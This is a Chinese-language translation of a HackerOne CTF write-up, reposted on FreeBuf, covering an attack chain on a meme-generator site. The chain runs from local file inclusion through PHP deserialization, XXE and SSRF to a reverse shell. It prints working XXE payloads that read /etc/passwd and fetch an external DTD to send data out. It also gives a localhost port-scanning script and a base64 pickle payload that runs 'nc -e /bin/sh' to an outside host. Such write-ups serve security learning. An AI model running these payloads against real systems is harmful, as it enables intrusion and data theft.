我们从HackerOne的推特中得知这场CTF竞赛,并立即行动了起来。这场CTF竞赛从推特上一张包含二维码的图片开始。
二维码返回以下信息:
这些字符看上去很眼熟,因为它们是url编码的字节。因此我们在每两个字符后面加上了一个‘%’。
然后我们用Burpsuite的解码器对这段字符进行了URL解码,得到了URL:(https://h1-5411.h1ctf.com):
紧接着,我们开始浏览这个网站:
这是一个创建表情包的网站,你可以选择一个模板(从一组封闭的图像中),然后制作属于你的表情包。我们发现一个有趣的页面,从这里真正的表情包开始产生:
可以选择表情包图片和文本的类型,在顶部和底部编辑关键的表情包文字之后,表情包将在底部展现。
从现在开始,每个生成的表情包都展示在”meme.php”页面上。
我们仔细观察了一下生成表情包的请求,我们注意到在交换数据(包含表情包参数template)时,响应返回一个JSON,其中包含远程服务器上的本地表情包的路径信息。
我们认为”template”参数区域可能容易受到本地文件包含的影响,并且确实如此。我们试图获取”/etc/passwd”文件,想办法去得到它:
在验证了漏洞之后,我们尝试获取这个网站的源码。我们从获取”index.php”开始:
一旦我们成功的获取到了index.php文件,我们就可以遍历获取源码中引用的每个php文件,从而导致源码几乎完全被转储(未涵盖的代码不会显示,因为没有被引用)。
我们开始审查源码,”header.php”引起了我们的注意。里面包含已经注释了的两个文件——导入和导出memes的php文件,看起来它们属于2.0版本的网站。
我们尝试去连接它们,发现在网站上可以查阅到:
快速的浏览了一下,EXPORT导出功能返回一个我们表情包的”memeapk”文件。
我们打开这个文件,显然这个文件包含php序列化数组的base64编码数据。
这立即使我们意识到可能着面临一个反序列化漏洞。在PHP中,为了反序列化对象,PHP需要熟悉类的信息——这意味着我们只能序列化原始的或者已经定义的类。
除了熟悉这些类, 我们还需要一个接收器函数 (神奇函数), 它包含我们控制的数据, 并将由系统本地触发。
在之前提取的”class.php”文件里,我们发现3个定义的类:
1. Template
2. Maintenance
3. ConfigFile
Maintenace类被注释掉并且注释表明它属于内部服务。
ConfigFile类是最有意思的一个,因为它包含”_toString”神奇函数,该函数执行”parse”函数,该函数加载外部XML,可能导致XXE漏洞。
我们有了我们想要序列化的类,现在我们必须要找到调用序列化方法的位置。我们看到正在序列化的内容是存储在会话中的memes数组:
当上传新的”memepak”文件时,反序列化阶段执行于导出功能处。这个函数首选确认我们上传了一个文件,然后读取文件内容,进行base 64 解码然后传送到unserialize函数中。
在这种情况下,我们尝试用反序列化函数来实现XXE。要做到这一点,需要调用”_toString”函数。在”memes.php”页面上,遍历memes数组,所以每个meme都被打印出来。打印该项触发了“_toString”方法,从而触发了”parse”函数。
为了创建ConfigFile对象的序列化字符串,我们将ConfigFile类复制到我们的电脑上,使用我们所需要的参数创建了一个ConfigFile的实例,将其序列化并将其回显到控制台:
上图中的”test.xml”文件包含一个恶意XXE payload,可以显示“/etc/passwd”文件。因此会返回以下字符串:
a:1:{i:0;O:10:"ConfigFile":1:{s:10:"config_raw";s:94:"<!DOCTYPE replace [<!ENTITY ent SYSTEM 'file:///etc/passwd'> ]><a><toptext>&ent;</toptext></a>";}}
如前所述,“import_memes_2.0.php”文件接受base 64 编码的序列化字符串,该字符串表示php数组。
我们发送了包含单个ConfigFile实例的序列化数组(带有恶意payload):
成功了!~
预料之中,得到了“/etc/passwd”,所以我们挖到了一个有效的XXE漏洞。
我们现在面临的问题是将XXE漏洞升级为远程代码执行(RCE)。
我们尝试了“expect://”模块,但是失败了。我们回想了在”classes.php”文件里提到的maintenance类,注释里提到内部服务,所以我们尝试了SSRF。
简单起见,我们更改了XXE的payload,以便获取外部DTD。这将使我们免去更改序列化PHP对象的麻烦,并且只需要我们调用”memes.php”来触发XXE。
新的序列化对象结果是:
a:1:{i:0;O:10:"ConfigFile":1:{s:10:"config_raw";s:127:"<!DOCTYPE replace [<!ENTITY % outside SYSTEM 'http://<<redacted>>/exfil.dtd'> %outside; ]> <a><toptext>&exfil;</toptext></a>";}}
而远程DTD文件的结果是:
<!ENTITY % data SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost:80/ "><!ENTITY exfil "%data;">
我们首先尝试了使用payload获取”localhost:80”,但是没有任何返回。我们尝试了其他常见端口但没有成功。我们写了一个遍历整个端口范围的脚本,来测试我们是否能得到不同的响应:
import requests
s = '''<!ENTITY % data SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost:80"><!ENTITY exfil "%data;">'''
for i in range(0,65535):
with open('exfil.dtd', 'w') as f:
f.write(s.replace('80',str(i) ))
print('[-] running ' + str(i))
r = requests.get('https://h1-5411.h1ctf.com/memes.php', cookies={'PHPSESSID' : 'ockij83kja86797h54m2r6pso9'} )
with open('results/'+ str(i) + '.html', 'w') as f:
f.write(r.text)
该脚本导致许多失败的结果(它们共享相同的文件大小3575)
终于,我们看到了一个文件大小不同的文件。该文件的端口号为1337:
文件的内容为:
base 64编码的内容(请注意debug参数):
我们尝试通过ssrf访问http://localhost:1337/status?debug=true ,并得到了如下返回:
经过base 64 解码我们得到如下内容:
这些数据看起来像是python序列化对象。
然后我们访问“http://localhost:1337/update-status?debug=true&status=on”然后得到如下返回:
这个返回使我们意识到我们应该对我们的数据进行编码(因为base 64 编码依赖于正确的填充)。
我们发送相同的请求,只编码”status”参数值并得到如下返回:
我们现在得到了一个不同的错误,说明服务器找不到MARK。此错误消息通常表示服务器正在尝试使用python pickle库取消选区对象。
我们发现如下gist,运行命令来产生pickle序列化python对象:https://gist.github.com/mgeeky/cbc7017986b2ec3e247aab0b01a9edcd
我们用这个gist生成python对象并使用base64进行编码:
这个序列化对象的内容是:
现在,我们更改了外部DTD以提供序列化对象:
<!ENTITY % data SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost:1337/update-status?status=Y3Bvc2l4CnN5c3RlbQpwMQooUyduYyAtZSAvYmluL3NoIGRvLm1hbGxvYy5jby5pbCA4MTkzJwpwMgp0UnAzCi4%3d&debug=true"><!ENTITY exfil "%data;">
然后,我们设置了一个netcat监听器并发送了请求。一旦XXE被触发,SSRF就会被触发,序列化对象被反序列化并且shell产生。现在我们有一个远程的shell,我们运行”ls”查看当前目录内容。我们观察到”flag.txt”文件并打开它,文件包含的内容如下所示:
*参考来源:HackerOne,由AngieQ编译,转载请注明来自FreeBuf.COM